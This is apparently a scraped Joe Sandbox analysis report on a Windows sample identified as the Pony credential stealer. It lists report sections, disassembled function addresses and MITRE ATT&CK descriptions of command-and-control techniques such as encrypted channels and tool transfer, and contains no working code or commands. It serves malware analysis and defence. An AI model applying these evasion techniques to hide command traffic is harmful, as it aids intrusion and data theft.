Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8WgZHDQckx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Pony

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
8WgZHDQckx.exe

Function 0040E9CE Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Function 0040D1E9 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Function 00404CB4 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Function 0040443E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Function 004057E5 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76
registryCOMMON

Function 00401F00 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172
registrystringCOMMON

Function 0040FBEC Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 118
stringCOMMON

Function 00402A46 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
COMMON

Function 004064D0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
registryCOMMON

Function 0040CE9D Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147
registryCOMMON

Function 004079F4 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146
registryCOMMON

Function 0040DA8D Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133
registryCOMMON

Function 00407D46 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126
registryCOMMON

Function 00402524 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
registryfileCOMMON

Function 00404E8C Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre